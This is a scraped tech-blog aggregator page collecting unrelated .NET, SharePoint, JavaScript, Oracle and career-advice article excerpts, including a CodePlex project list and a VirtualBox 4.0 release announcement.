helium...IconizedButton Control Set: ASP.NET WebForms IconizedButton Custom Control Set. Replaces the dull Button/LinkButton/HyperLink controls with styling and left and right aligned...Jedi Council PM List: Allows for users to process Private Message Lists on the Jedi Council forums for TheForce.Net.JetPumpDesign: 本软件为蒸气喷射泵设计计算软件 作者:申阳 单位:西安交通大学过程装备与控制工程61班log4Nez: An high personalized implementation of a logging libraryMutantFramework: Provides a common set of building blocks for building enterprise applicationsNUnit Add-in for Growl Notifications: NUnit add-in which allows to send notifications to Growl when test run is started or finished, when a first test failure occurs and so on.Object Reports: Object Reports is a "proof of concept" application which provides users the ability to visualy build queries based on data stored in the relational...openTrionyx: openTrionyx is a set of tools to make easier web application development. Includes Data, Web and plain text documents tools. Developed in C#, compl...Partial Rendering control for MVC 2: This project shows a web custom control that allow to have partial rendering using async post-back (through JQuery) in a MVC 2 web application.PowerGUI Visual Studio Extension: The PowerGUI Visual Studio Extension exposes PowerGUI as an editor in Visual Studio. PowerShell developers can now write scripts directly in Visual...PowerShell Script Provider: Write your own PowerShell provider using only script, no C# required. Module definition is provided by a Windows PowerShell 2.0 Module, which may b...Scholar: Scholar is a solution/framework for .Net developers to help with the creation of distributed data processing (think SETI@home style apps). It is in...scrabb: Scrabb help people play scrabble over net.SharePointNuke: A DotNetNuke module that connects to a SharePoint server using web services API and displays the content of a specified list. SolidWorksBackConverter: a Project to Convert a solidwork file to an older version Soma - Sql Oriented MApping framework: Sql Oriented MApping framework.SPCreate: SPCreate auto store procedure creator. It's developed in c#. SpCreate as output ADO.NET Class (C# or VB.Net) and SQL Server or MS Access Store pro...std::streambuf wrapper for COM IStream: This provides a subclass of std::streambuf that wraps a COM IStream, so you can use an IStream with any C++ code that uses iostreams or the STL alg...VACID solutions: Solutions of verification problems posed in paper "Verification of Ample Correctness of Invariants of Data-structures". Developed with various tool...Viewer: Our Goal is to create a C# project that will centeralize Image and Movie Viewing in a forms application, It will also have a Specialized Webbrowser...vsXPathTester: vsXPathTester is a utility for Developer. This help them load XML file and the run their XPath Query. The Resultant is shown in window. It save the...New Releases.Net Max Framework: Version 1.0.0: Version 1.0.0 - EstableAndrew's XNA Helpers: V1.2: Features upgraded features based off of the V1.1 code for both X86 and XBOX Additions/Changes Reworked the Texture2D and Rectangle extender namesp...BaseCalendar: BaseControls 1.2: BaseControls 1.2 contains the BaseCalendar ASP.NET control. Changes: 1.2 Exposed EffectiveVisibleDate and FirstVisibleDay methods 1.1 Rendering ...Customer Book: Customer Book Code: Bronze Release PostgreSQL database dump for Customer Book. Open PgAdmin III and restore the database dump into your server. Notice User Name for t...Data Connection Suite: Data Connections Suite v1.0.0.0: This is the first release of this incomplete component, but good enought to use in a production environment (it's what we do).DigitArchive: Build 8: Now the software works on .NET 3.5 and above. So if you have Windows 7 it installs without any pre-requisites. Changes: -Works on .NET 3.5 -Now t...Doom 64 Ex (SVN Builds): Doom 64 Ex r-738: Finally a new build after so many months. There are way to many updates to even begin to write about here just download and frag away. There is a s...DotNetNuke® Media: 03.03.00a: This release is Beta!! There is no guaranteed upgrade path to the 03.03.00 release version! Please use this to help us and test what we have. Repor...Downline Commision Generator: Downline Commision Generator: Downline Commision GeneratorElmah2 : An extensable error logger for ASP.net: 1.0 Beta 1: This is a beta release be sure to report any errors etc. Be sure to check out the documentation tab on information on how to install and configure...EPiServer Template Foundation: First compiled release: First compiled release for experimenting only! :) An introductory post will be published shortly on the blog.Helium: Initial Release: This is the initial release of the Helium Engine. Please check out the documentation link for information on how to use the engine. To see a ful...IconizedButton Control Set: IconizedButton Control Set: Taking a line from Google's play book - marking everything as Beta. Seriously, I'd like to hear some feedback before moving the Development Status...JetPumpDesign: JetPumpDesign 1.0: 当前的软件可以设计5级以内的蒸汽喷射泵。Microsoft Silverlight Analytics Framework: Version 1.4.4 Installer: Tools TargetingVisual Studio 2010 Expression Blend 4 (part of Expression Studio 4) Analytics Services Included Vendor Behavior Silverlight 3...NHibernate Sidekick Library: 0.7.0: Added a few methods for use with the NHibernate 2nd level cache (EvictAllObjectsFromCache and EvictPersistentClass). I also added the boolean optio...NHibernate Sidekick Library: 0.7.5: Fix for http://nhprof.com/Learn/Alerts/DoNotUseImplicitTransactionsNito.KitchenSink: Version 9: Dependencies Nito.Linq 0.6 Beta (released 2010-06-14) Rx 1.0.2563.0 (released 2010-06-09) Supported Platforms .NET 4.0 Client Profile, with Rx. ...NQueue: Version 1.0.0.0: Version 1.0.0.0NUnit Add-in for Growl Notifications: NUnit Add-in for Growl Notifications 1.0 build 0: The very first stable releasePartial Rendering control for MVC 2: Partial Rendering control for MVC 2: Here there is the source code and a MVC 2 web site as testPowerShell Script Provider: PSProvider 0.1: Requires PowerShell 2.0 RTM The functions in the attached ps1 script are the bare minimum for a working container-style provider (no subfolders.) ...Quick Performance Monitor: Version 1.4.3: Fixed issue where if an instance name contains backslash characters (\) the program would not load the performance counter properly. Also added sta...SharePointNuke: SharePointNuke 2.00.08: SharePointNuke 2.00.08 - Binary DotNetNuke 5.x module.Skype Voice Changer: 1.0 Updated Sample Code: This updated release is the accompanying code for the Skype Voice Changer article on Coding4Fun. Changes in this release: Added support for PreEmp...std::streambuf wrapper for COM IStream: Beta release (tested in a commercial project): This code has been tested in a custom Windows Search filter and property handler I wrote for a proprietary binary format. There may be some bugs, b...Sunlit World Scheme: Sunlit World Scheme - 20100615 - source and binary: This is the result of building the current source code in Debug mode. The source code is included. The binaries are in the SchemeCode folder along...Timo-Design / 40FINGERS DotNetNuke® Skinning Extensions: Style Helper Skin Object Beta: The 40FINGERS Style Helper Skin object allows you to add CSS and Javascript links and meta tags to the head of your page. It can also remove CSS l...Umbraco CMS: Umbraco 4.1 RC: This is the final test version of Umbraco 4.1 before the final release. PLEASE BE AWARE THAT UMBRACO 4.1 RC IS A .NET 4.0 RELEASE AND WON'T WORK O...VCC: Latest build, v2.1.30615.0: Automatic drop of latest buildWCF 4 Templates for Visual Studio 2010: UserNameForCertificate Template: Produces a WCF service application supporting username and password authentication, relying on message security to protect messages en route. Suppl...WCF 4 Templates for Visual Studio 2010: UserNameOverHttps Template: Produces a WCF service application supporting username and password authentication over HTTPS/SSL, relying on transport security to protect message...xUnit.net Contrib: xunitcontrib 0.4.1 alpha (ReSharper 5.1.1709 only): xunitcontrib release 0.4.1 (ReSharper runner) This release targets the current nightly build of ReSharper 5.1's Early Access Programme (build 1709)...Most Popular ProjectsCommunity Forums NNTP bridgeRIA Services EssentialsNeatUploadBxf (Basic XAML Framework).NET Transactional File ManagerSOLID by exampleSSIS Expression Editor & TesterWEI ShareChirpy - VS Add In For Handling Js, Css, and DotLess FilesASP.NET MVC Time PlannerMost Active ProjectsdotSpatialRhyduino - Arduino and Managed CodeCassandraemonpatterns & practices – Enterprise LibraryCommunity Forums NNTP bridgeLightweight Fluent Workflowpatterns & practices: Enterprise Library ContribNB_Store - Free DotNetNuke Ecommerce Catalog ModuleBlogEngine.NETjQuery Library for SharePoint Web Services

    Read the article

  • C#.NET vs VB.NET, Which language is better?

    Features I cannot say any language good or bad as long as it's compiler can produce MSIL can run under .NET CLR. If someone says C# has more futures, you can understand that those new features are of C# compiler but not .NET, because if C# has a specific future then CLR cannot understand them. So the new features of C# will have to convert to the code understood by CLR eventually. that means the new features are developed for C# compiler basically to facilitates the developer to write their code in better way. so that means no difference in feature list between C# and VB.NET if you think in CLR perspective. Ease of writing Code I feel writing code in C# is easy, because my background is C and C++, Java, syntaxes very are similar. I assume most developers feel the same. Readability But some people say VB.NET code most readable for the members who are from non technical background, because keywords are generally in English rather special charectors. No of Projects in Market I assume 80 percent of market uses C# in their .NET development. for example in my company many projects are there .nET and all are using C#. Productivity & Experience though the feature list is same, generally developers wants to write code in their familiar languages. because it increase the productivity. Hope this helps to choose the language which suits for you. span.fullpost {display:none;}

    Read the article

  • So&hellip; What is a SharePoint Developer?

    - by Mark Rackley
    A few days ago Stacy Draper and I were chatting about what it means to be a SharePoint Developer. That actually turns about to be a conversation with lots of shades of grey. Stacy thought it would make a good blog post… well, I can’t promise this to be a GOOD blog post… So, anyway, I decided to let off a little bomb this morning by posting the following tweet on Twitter: @mrackley: Can someone be considered a SharePoint Developer if all they know how to do is work in SPD? Now, I knew this is a debate that has been going on since the first SharePoint Designer User put SharePoint Developer on their resume. There are probably several blogs out there on the subject, but with the wildfire that is jQuery and a few other new features out there I believe it is an important subject to tackle again. I got a lot of great feedback as well on Twitter. The entire twitter conversation is at the end of this blog posting. Thanks everyone for their opinions. Who cares? Why does it matter? Can’t we all just get along? Yes it matters… everything must be labeled and put in it’s proper place. Pigeon holing is the only way to go!  Just kidding.. I’m not near that anal, but yes! It is important to be able to properly identify the skill set of those people on your team and correctly identify the role you are wanting to hire. Saying you are a “SharePoint Developer” is just too vague and just barely begins to answer the question. Also, knowing who’s on your team and what they can do will ensure you give your clients the best people for the job. A Developer writes code right? So, a Developer uses Visual Studio! Whoa, hold on there Sparky. Even if I concede that to be a developer you have to write code then you still can’t say a SharePoint Developer has to use Visual Studio.  So, you can spell C#, how well can you write XSLT? How’s your jQuery? Sorry bud, that’s code whether you like it or not. There are many ways to write code in SharePoint that have nothing to do with cracking open Visual Studio. So, what are the different ways to develop in SharePoint then? How many different ways can you “develop” in SharePoint?? A lot… Out of the box features In SharePoint you can create a site, create a custom list on that site, do basic calculations in a calculated column, set up alerts, and add all sorts of web parts to a page. Let’s face it.. that IS development! javaScript/jQuery Perhaps you’ve heard by now about this thing called jQuery? It’s all over the place and the answer to a lot of people’s prayers. However be careful, with great power comes great responsibility. Remember, javaScript is executed on the client side and if you abuse it your performance could be affected. Also, Marc Anderson (@sympmarc) wrote a pretty awesome javaScript library called SPServices.  This allows you to access SharePoint’s Web Services using jQuery. How freakin cool is that? With these tools at your disposal the number of things you CAN’T do without Visual Studio grows smaller and smaller. This is definitely development no matter what anyone else says and there is no Visual Studio involved. SharePoint Designer Ahhh.. The cause of and the answer to all of your SharePoint development problems. With SharePoint Designer you can use DataView Web Parts, develop (there’s that word again) your branding, and even connect to external datasources.  There’s a lot you can do in SharePoint Designer. It’s got it’s shortcomings, but it is an invaluable tool in the SharePoint developers toolbox. InfoPath So, can InfoPath development really be considered SharePoint development? I would say yes. You can connect to SharePoint lists, populate fields in a SharePoint list, and even write code in InfoPath. Sounds like SharePoint development to me. Visual Studio – Web Services/WCF So, get this. You can write code for SharePoint and not have a clue what the 12 hive is, what “site actions” means, or know how to do ANYTHING in SharePoint? Poppycock! You say? SharePoint Web Services I say… With SharePoint Web Services you can totally interact with SharePoint without knowing anything about SharePoint. I don’t recommend it of course, but it’s possible. What can you write using SharePoint Web Services? How about a little application called SharePoint Designer? Visual Studio – Object Model And here we are finally:  the SharePoint Object Model.  When you hear “SharePoint Developer” most people think of someone opening Visual Studio and creating a custom web part, workflow, event receiver, etc.. etc.. but I hope that by now I have made the point that this is NOT the only form of SharePoint Development! Again… Who cares? Just crack open Visual Studio for everything! Problem solved! Let’s ponder for a moment, shall we? The business comes to you with a requirement that involves some pretty fancy business calculations, and a complicated view that they do NOT want to look like SharePoint. “No Problem” you proclaim you mighty SharePoint Developer. You go back to your cube, chuckle at the latest Dilbert comic, and crack open Visual Studio. Then you build your custom web part… fight with all the deployment, migration, and UAT that you must go through and proclaim victory two weeks later!!!! Well done my good sir/ma’am! Oh wait… it turns out Sally who is not a “developer” did the exact same thing with a Dataview web part and some jQuery and it’s been in production for two weeks? #CockinessFail I know there are many ASP.NET developers out there that can create a custom control and wrap it to be a SharePoint Web Part.  That does NOT mean they are SharePoint Developers though as far as I’m concerned and I personally would much rather have someone on my team that can manipulate the heck (yes, I said ‘heck’) out of SharePoint using Dataview Web Parts, jQuery, and a roll of duct tape. Just because you know how to write code in Visual Studio does not mean you are a SharePoint Developer. What’s the conclusion here? How do we define ‘it’ and what ‘it’ is called? Fortunately, this is MY blog. I don’t have to give answers, I can stir the pot, laugh and leave you to ponder what it means! There is obviously no right or wrong answer here (unless you disagree with me,then you are flat out wrong). Anyway, there are many opinions.  Here’s mine.  If you put SharePoint Developer on your resume make sure to clearly specify HOW you develop in SharePoint and what tools you use. If we must label these gurus of jQuery and SPD, how about “SharePoint Client Developer” or “SharePoint Front End Developer”? Just throwing out an idea. Whatever we call them, to say they are not developers is short-sighted, arrogant, and unfair. Of course, then we need to figure out what to call all those other SharePoint development types.  Twitter Conversation @next_connect: RT @mrackley: Can someone be considered a SharePoint Developer if all they know how to do is work in SPD? | I say no.... @mikegil:  @mrackley re: yr Developer question: SPD expert <> SP Developer. Can be "sous-developer," though. #SharePoint #SPD @WonderLaura:  Rt @mrackley Can someone be considered a SharePoint Dev if all they know how to do is work in SPD? -- My opinion is that devs write code. @exnav29:  Rt @mrackley Can someone be considered a SharePoint Dev if all they know how to do is work in SPD? => I think devs would use VS as well @ssKevin:  @WonderLaura @mrackley does that mean strictly vb and c# when it comes to #SharePoint ? @jimmywim:  @exnav29 @mrackley nah, I'd say they were a power user. Devs know their way around the 12 hive ;) @sympmarc:  RT @mrackley: Can someone be considered a SharePoint Developer if all they know how to do is work in SPD? -> Fighting words. @sympmarc:  @next_connect @mrackley Besides, we prefer to be called "hacks". ;+) @next_connect:  @sympmarc The important thing is that you don't have to develop code to solve problems and create solutions. @mrackley @mrackley:  @sympmarc @next_connect not tryin to pick fight.. just try and find consensus on definition @usher:  @mrackley I'd still argue that you have a DevLite title that's out there for the collaboration engineers (@sympmarc @next_connect) @next_connect: @usher I agree. I've called it Light Dev/ Configuration before. @sympmarc @mrackley @usher:  @next_connect I like DevLite, low calorie but still same great taste :) @mrackley @sympmarc @mrackley:  @next_connect @usher @sympmarc I don't think there's any "lite" to someone who can bend jQuery and XSLT to their will. @usher:  @mrackley okay, so would you refer to someone that writes user controls and assemblies something different (@next_connect @sympmarc) @usher:  @mrackley when looking for a developer that can write .net code, it's a bit different than an XSLT/jQuery designer. @sympmarc @next_connect @jimmywim:  @mrackley @sympmarc @next_connect I reckon a "dev" does managed code and works in the 12 hive @sympmarc:  @jimmywim @mrackley @next_connect We had a similar debate a few days ago @toddbleeker et al @sympmarc:  @sympmarc @jimmywim @mrackley @next_connect @toddbleeker @stevenmfowler More abt my Middle Tier term, but still connected. Meet bus need. @toddbleeker:  @sympmarc @jimmywim @mrackley @next_connect I used "No Assembly Required" in the past. I also suggested "Supplimenting the SharePoint DOM" @toddbleeker:  @sympmarc @jimmywim @mrackley @next_connect Others suggested Information Worker Solutions/Enhancements @toddbleeker:  @sympmarc @jimmywim @mrackley @next_connect @stevenmfowler I also like "SharePoint Scripting Solutions". All the technologies are script. @jimmywim:  @toddbleeker @sympmarc @mrackley @next_connect I like the IW solutions one... @toddbleeker:  @sympmarc @jimmywim @mrackley @next_connect @stevenmfowler This is like the debate that never ends: it is definitely not called Middle Tier. @jimmywim:  @toddbleeker @sympmarc @mrackley @next_connect @stevenmfowler "Scripting" these days makes me think PowerShell... @sympmarc:  @toddbleeker @jimmywim @mrackley @next_connect @stevenmfowler If it forces a debate on h2 best solve bus probs, I'll keep sayin Middle Tier. @usher:  @sympmarc so we know what we're looking for, we just can't define a name? @toddbleeker @jimmywim @mrackley @next_connect @stevemfowler @sympmarc:  @usher @sympmarc @toddbleeker @jimmywim @mrackley @next_connect @stevemfowler The naming seems to matter more than the substance. :-( @jimmywim:  @sympmarc @usher @toddbleeker @mrackley @next_connect @stevemfowler work brkdn defines tasks, defines tools needed, can then b grp'd by user @WonderLaura:  @mrackley @toddbleeker @jimmywim @sympmarc @usher @next_connect Funny you're asking. @johnrossjr and I spent hours this week on the subject. @stevenmfowler:  RT @toddbleeker: @sympmarc @jimmywim @mrackley @next_connect @stevenmfowler it is definitely not called Middle Tier. < I'm with Todd

    Read the article

  • JavaScript local alias pattern

    - by Bertrand Le Roy
    Here’s a little pattern that is fairly common from JavaScript developers but that is not very well known from C# developers or people doing only occasional JavaScript development. In C#, you can use a “using” directive to create aliases of namespaces or bring them to the global scope: namespace Fluent.IO { using System; using System.Collections; using SystemIO = System.IO; In JavaScript, the only scoping construct there is is the function, but it can also be used as a local aliasing device, just like the above using directive: (function($, dv) { $("#foo").doSomething(); var a = new dv("#bar"); })(jQuery, Sys.UI.DataView); This piece of code is making the jQuery object accessible using the $ alias throughout the code that lives inside of the function, without polluting the global scope with another variable. The benefit is even bigger for the dv alias which stands here for Sys.UI.DataView: think of the reduction in file size if you use that one a lot or about how much less you’ll have to type… I’ve taken the habit of putting almost all of my code, even page-specific code, inside one of those closures, not just because it keeps the global scope clean but mostly because of that handy aliasing capability.

    Read the article

  • Please help me, I need some solid career advice, put myself in a dumb situation

    - by Kevin
    Hi, First off, I just want to say thank you in advance for looking at my question and would really value your input on this subject. My core question is how do I proceed from the following predicament. I will be honest with you, I wasted my College Experience. I slacked off and didn't take any of my comp sci classes that seriously, somehow i still got out with a 3.25 GPA. But truth be told I learned nothing. I befriended most of my professors who went pretty lenient on me in terms of grading. However, I basically came out of College knowing how to program a simple calculator in VB.Net. I was (to my great surprise) hired by a very large respected company in Denver as a Junior developer. Well the long and the short of it is that I knew so little about programming that I quickly became the office pariah and was almost fired due to my incompetence. It has been 8 months now and I feel I have learned some basic things and I am not as picked on as I used to be by the other developers. However, everyone hates me and the first few months have given the other developers a horrible perception of me. I am no longer afraid of code or learning, but I have put my self in the precarious position of being the scapegoat of our department. I hate going to work every day because no one there is my friend and pretty much everyone is hostile to me. What should I do? Any advice?

    Read the article

  • Oracle VM VirtualBox 4.0 Now Available

    - by Paulo Folgado
    Delivering on Oracle's commitment to open source, Oracle VM VirtualBox 4.0 is now available, further enhancing the popular, open source, cross-platform virtualization software.   "Oracle VM VirtualBox 4.0 is the third major product release in just over a year, and adds to the many new product releases across the Oracle Virtualization product line, illustrating the investment and importance that Oracle places on providing a comprehensive desktop to datacenter virtualization solution," says Wim Coekaerts, senior vice president, Linux and Virtualization Engineering, Oracle. "With an improved user interface and added virtual hardware support, customers will find Oracle VM VirtualBox 4.0 provides a richer user experience." Part of Oracle's comprehensive portfolio of virtualization solutions, Oracle VM VirtualBox enables desktop or laptop computers to run multiple guest operating systems simultaneously, allowing users to get the most flexibility and utilization out of their PCs, and supports a variety of host operating systems, including Windows, Mac OS X, most popular flavors of Linux (including Oracle Linux), and Oracle Solaris. Oracle VM VirtualBox 4.0 delivers increased capacity and throughput to handle greater workloads, enhanced virtual appliance capabilities, and significant usability improvements. Support for the latest in virtual hardware, including chipsets supporting PCI Express, further extends the value delivered to customers, partners, and developers. Highlights of Oracle VM VirtualBox 4.0 include New Open Architecture - Oracle and community developers can now create extensions that customize Oracle VM VirtualBox and add features not previously available.Enhanced Usability - A new scalable display mode enables users to view more virtual displays on their existing monitors. Improvements to VM management, including visual VM previews, an optional attributes display, and easy launch shortcut creation enables administrators and power users to customize the interface to make it as simple or as comprehensive as required.Increased Capacity and Throughput - A new asynchronous I/O model for networked (iSCSI) and local storage delivers significant storage related performance improvements, while new optimizations allow larger datacenter-class workloads, such as Oracle's middeware, to be run on 32-bit Windows hosts for testing and demo purposes. Powerful Virtual Appliance Sharing Capabilities - Enhanced support for standards-compliant OVF appliances and added support for OVA format descriptors. All information about a VM may be stored in a single folder to facilitate easier direct sharing among VMs. Support for Latest Virtual Hardware - A new, modern virtual chipset supporting PCI Express and other hardware enhancements including high-definition audio devices helps ensure support for the most demanding virtual workloads.

    Read the article

  • Misunderstanding Scope in JavaScript?

    - by Jeff
    I've seen a few other developers talk about binding scope in JavaScript but it has always seemed to me like this is an inaccurate phrase. The Function.prototype.call and Function.prototype.apply don't pass scope around between two methods; they change the caller of the function - two very different things. For example: function outer() { var item = { foo: 'foo' }; var bar = 'bar'; inner.apply(item, null); } function inner() { console.log(this.foo); //foo console.log(bar); //ReferenceError: bar is not defined } If the scope of outer was really passed into inner, I would expect that inner would be able to access bar, but it can't. bar was in scope in outer and it is out of scope in inner. Hence, the scope wasn't passed. Even the Mozilla docs don't mention anything about passing scope: Calls a function with a given this value and arguments provided as an array. Am I misunderstanding scope or specifically scope as it applies to JavaScript? Or is it these other developers that are misunderstanding it?

    Read the article

  • Oracle ACEs in the House

    - by Justin Kestelyn
    As is customary, the Oracle ACEs have invaded the Oracle Develop Conference agenda.Why? Because Oracle ACE-dom inherently is a stamp of not only expertise, but a unique ability to make that expertise useful to others. Plus, they're a group of "fine blokes" (UK. subjects, educate me: is that really a word?)Perhaps if you're not able to catch one of these sessions, you will be able to see the applicable ACE in action elsewhere, at a conference or user group meeting near you. Session ID Session Title Speaker, Company S313355 Developing Large Oracle Application Development Framework 11g Applications Andrejus Baranovskis, Red Samurai Consulting S316641 Xenogenetics for PL/SQL: Infusing with Java Best Practices and Design Patterns Lucas Jellema, AMIS; Alex Nuijten, AMIS S317171 Building Secure Multimedia Web Applications: Tips and Techniques Marcel Kratochvil, Piction; Melliyal Annamalai, Oracle S315660 Database Applications Lifecycle Management Marcelo Ochoa, Facultad de Ciencias Exactas S315689 Building a High-Performance, Low-Bandwidth Web Architecture Paul Dorsey, Dulcian, Inc. S316003 Managing the Earthquake: Surviving Major Database Architecture Changes Paul Dorsey, Dulcian, Inc.; Michael Rosenblum, Dulcian, Inc. S314869 Introduction to Java: PL/SQL Developers Take Heart Peter Koletzke, Quovera S316184 Deploying Applications to Oracle WebLogic Server Using Oracle JDeveloper Peter Koletzke, Quovera; Duncan Mills, Oracle S316597 Using Collections in Oracle Application Express: The Definitive Intro Raj Mattamal, Niantic Systems, LLC S313382 Using Oracle Database 11g Release 2 in an Oracle Application Express Environment Roel Hartman, Logica S313757 Debugging with Oracle Application Express and Oracle SQL Developer Dimitri Gielis, Sumneva S313759 Using Oracle Application Express in Big Projects with Many Developers Dimitri Gielis, Sumneva S313982 Forms2Future: The Ongoing Journey into the Future for Oracle-Based Organizations Lucas Jellema, AMIS; Peter Ebell, AMIS

    Read the article

  • Seattle GiveCamp this Weekend

    - by Stephen.Walther
    Seattle GiveCamp is this weekend (October 19, 2012) on the Microsoft Campus. Donate your time and your programming skills to build software applications (mainly websites) for charities. We need you! Go to the following address and sign up to participate right now: http://seattlegivecamp.com/ We have more than 20 charities participating in this year’s GiveCamp and over 100 volunteers. We need people with all sorts of skills including WordPress, design, ASP.NET, SEO, Mobile, and Project Management skills. If you know how to tweak a WordPress theme or you know how to use Adobe Photoshop or you know Salesforce or Microsoft Access then we really, really need you this weekend. This is a great event to network with other developers, show off your ninja programming skills, and help some great charities. Be prepared to show up at Friday night and start working in a team to write some great code. You can stay until Sunday night for the full event or you can leave early (in previous events, some developers did marathon coding sessions for multiple days straight – but those guys are insane). My wife, Ruth Walther, is the director of this year’s GiveCamp. She’ll be there and I’ll be there. I hope to see you at GiveCamp!

    Read the article

  • JavaOne Latin America Underway

    - by Tori Wieldt
    JavaOne Latin America started officially today, but lots of networking has already happened. Last night some JUG leaders, Java Champions, and members of the Oracle Java development and marketing teams had dinner together. The conversation ranged from the new direction of JavaFX to how to improve JUG attendance. Maricio Leal shared the idea some Brazilian JUGs have of putting Java Evangelists and experts on a boat and having them visit JUGs on cities along the Amazon river.  We discussed ideas, and shared dessert pizza. It was the perfect community get together! If you see Brazilian Java Man Bruno Souza, ask him what he is bringing to the party.Today, at JavaOne Latin America, all the sessions were full, and developers were spilling into the hallways. Session content was selected with the help of 14 Java thought leaders from Latin America. JavaOne Program Committee Chair, Sharat Chander, said "I'm thrilled that at this JavaOne over half of the content is coming from the community." Between sessions, developers take advantage of the Oracle Technology Network lounge to grab a snack and use their laptops.  OTN LoungeIt promises to be a great JavaOne.

    Read the article

  • release management system - architectural question

    - by Sonic Soul
    Every place i've worked created their own release process, and all of them worked pretty well, however it took pretty good effort (and often a dedicated team) to manage releases. I am currently at a new place, and about to design such a system, however this time the team is very lean and we won't have dedicated resources to releasing. It will be up to development manager until the system is proofed enough for other developers to use. we're using Subversion as code repository, Team City as the build server, Jira issue tracker, Oracle db. I was thinking about writing a basic workflow app, that will let developers create a new manifest which will specify the following items. release details (who, jira issues etc) workflow step (dev, test, uat, prod approved, prod released) source files that last item is where it can get hairy. especially with database scripts. Figured I'd ask if there is a good pattern, or off the shelf product that could help with the database part, or perhaps the whole process. I briefly tested Red Gate Oracle deployment tool, but it didn't work out as well as I had hoped (from 1 day of testing at least) Questions: I think I could get around releasing of our code with something like Octopus Deploy straight from Team City. I am not clear however, how I could create a simple database deployment part, that will track which version of which script (from subversion) has been deployed where. Is there already some utility I could utilize for navigating subversion to choose which scripts should be released, instead of writing one from scratch. I'd just need it to produce some manifest of paths + versions.

    Read the article

  • what is a normal developer to pageview ratio?

    - by Anthony Shull
    I work for an e-commerce site that has lately been shedding its workforce. I was hired ten months ago as a UI Developer. At that time we had three other developers. One was the technical lead who had been with the company for 10 years. The other two were server-side developers who had been there for 10 and 3.5 years respectively. In ten months, the technical lead left for a better position, one developer was laid off, and the other very recently left. So, I am now the only developer on staff. We have one DBA and one network administrator. They are currently looking to hire another developer but are not willing to pay enough to hire a senior person. I consider myself a junior developer with two years of experience. I have argued that we need to hire at least one senior developer and another junior developer if we're going to keep our current site operational (not to mention develop new features)...even if that means laying off staff in other departments. Right now we get 6.5 million pageviews per month, and I feel like 3.2 million pageviews per developer must be incredibly abnormal. My question is then: what is a normal developer to pageview ratio? Are there any industry standards or literature on the subject that I can use to argue for more staff?

    Read the article

< Previous Page | 109 110 111 112 113 114 115 116 117 118 119 120  | Next Page >